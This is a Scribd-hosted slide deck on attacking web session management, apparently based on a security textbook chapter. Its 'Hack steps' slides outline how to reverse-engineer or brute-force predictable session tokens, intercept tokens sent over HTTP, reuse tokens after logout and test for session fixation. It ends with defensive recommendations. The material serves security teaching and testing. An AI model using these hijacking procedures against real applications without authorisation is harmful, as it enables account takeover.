Scribd Logo
Upload

Welcome to Scribd!

  • Attacking Session Management Juliette Lessing

    Uploaded by

    Joona John
    14 views19 pages
    security

    Original Title

    Session

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    security

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    14 views19 pages

    Attacking Session Management Juliette Lessing

    Uploaded by

    Joona John
    security

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 19

    Chapter 7

    Attacking Session Management

    Juliette Lessing
    Session management

    Enables the application to uniquely identify


    a given user across a number of different
    requests.

    Prime target for malicious attacks against


    application.

    Encountered defects.
    Two types of weaknesses

    Weaknesses in Session Token


    Generation

    Weaknesses in the handling of session


    tokens throughout their lifecycle.
    Weaknesses in Session Token
    Generation
    Meaningful tokens (1)
    Created using a transformation of the
    users user name or other info
    associated with them

    But actually:
    Meaningful tokens (2)
    Exhibit some structure allowing an attacker
    to understand their function and means of
    generation.

    Components:

    User name
    E-mail address
    Clients IP address
    Meaningful tokens (3)
    Hack steps:
    Obtain single token from the application, modify it to determine validity. Change tokens
    value one byte at a time and check whether application is still accepted. Are some
    portions not required to be correct, exlude them.

    Log in as several different users at different times and record the tokens received from the
    server.

    Analyze the tokens for any correlations that appear to be related to the username and
    other user-controllable data.

    Analyze the tokens for any detectable encoding or obfuscation.

    If any meaning can be reverse engineered from the sample of session tokens, guess the
    tokens, find a page of the application that is session-dependent, and make large numbers
    of requests to this page using these guessed tokens. Monitor the results for any cases
    where the page is loaded correctly, indicating a valid session token.
    Weaknesses in Session Token
    Generation
    Predictable tokens (1)
    Contain sequences or patterns
    Arise from 3 different sources:

    1. Concealed sequences
    2. Time dependency
    3. Weak random number generation
    Predictable tokens (2)
    1. Concealed sequences


    Predictable tokens (2)
    2. Time dependency Attack:
    Start polling the server to obtain new session tokens in quick
    succession
    Monitor the increments in the first number. Increases more
    than one? Token has been issued by another user
    We know upper and lower bounds of second number which
    was issued to them
    brute-force attacks in order to successfully access a
    protected page
    Running this scripted attack continuously will enable us to
    capture the session token of every other application user.
    When an administrative user logs in, we will fully
    compromise the entire application.
    Predictable tokens (3)
    3. Weak random number generation

    This algorithm takes the last number generated,


    multiplies it by one constant, and adds another
    constant, to obtain the next number. The number is
    truncated to 48 bits, and the algorithm shifts the result
    to return the specific number of bits requested by the
    Weaknesses in Session Token
    Handling
    Disclosure of tokens on the network (1)

    Weaknesses occur when:


    Some applications elect to use HTTPS to protect the users
    credentials during login but then revert to HTTP for the
    remainder of the users session
    Some applications use HTTP for preauthenticated areas of
    the site, such as the sites front page, but switch to HTTPS
    from the login page onwards.
    Disclosure of tokens on the network (2)

    Hack steps:
    Walk through application in normal way and identify login functions and transitions
    between HTTP and HTTPS communications

    Are HTTP cookies used as transmission mechanism? Verify whether secure flag is
    set

    Determine whether session tokens are ever transmitted over an unencrypted


    connection. Yes? Regard them as vulnerable to interception

    Verify whether a new token is issued following login, or whether a token transmitted
    during the HTTP stage is still being used to track the users authenticed session

    Verify whether server is listening on port 80. If so, visit any HTTP URL directly from
    with an authenticated session and verify whether the session token is transmitted

    In cases where a token for an authenticated session is transmitted to the server over
    HTTP, verify whether that token continues to be valid or is immediately terminated by
    the server.
    Weaknesses in Session Token
    Handling
    Disclosure of tokens in logs

    causes of session tokens appearing in


    system logs
    Weaknesses in Session Token
    Handling
    Vulnerable session termination (1)
    Some applications do not provide effective
    logout functionality:
    A log-out function is not implemented
    The logout function does not actually cause the server to
    invalidate the session
    When a user clicks Logout, this fact is not communi-
    cated to the server at all, and so the server performs no
    action whatsoever.
    Vulnerable session termination (2)

    Hack steps:
    Investigate whether session expiration is implemented on the
    server side

    Determine whether a logout function exists and is prominently


    made available to users. If not, users are more vulnerable
    because they have no means of causing the application to
    invalidate their session.

    Where a logout function is provided, test its effectiveness.


    After logging out, attempt to reuse the old token and
    determine whether it is still valid. If so, users remain
    vulnerable to some session hijacking attacks even after they
    have logged out.
    Weaknesses in Session Token
    Handling
    Client Exposure to Token Hijacking
    Hack steps (1):

    Identify any cross-site scripting vulnerabilities within the


    application and determine whether these can be exploited to
    capture the session tokens of other users
    If the application issues session tokens to unauthenticated,
    obtain a token and perform a login.
    Hack steps (2):

    Check whether the application is willing to return to the login


    page eventhough you are already authenticated, sumbit
    another login as a different user using the same token. If it
    does not issue a fresh token, it is vulnerable to session
    fixation

    Identify the format of session tokens used by the application.


    Modify your token to an invented value that is validly formed,
    and attempt to login. If the application allows you to create
    an authenticated session using an invented token, then it is
    vulnerable to session fixation.
    Securing Session Management

    In order to perform session management in a


    secure manner:

    1. Generate strong tokens


    2. Protect Tokens throughout Their Lifecycle
    should only ever be transmitted over HTTPS
    never be transmitted in the URL
    Logout functionality should be implemented
    Session expiration should be implemented after a
    suitable period of inactivity (e.g., 10 minutes).
    Etc.
    Securing Session Management

    Per-page Tokens
    New page is created every time
    Prevents session fixation attacks

    You might also like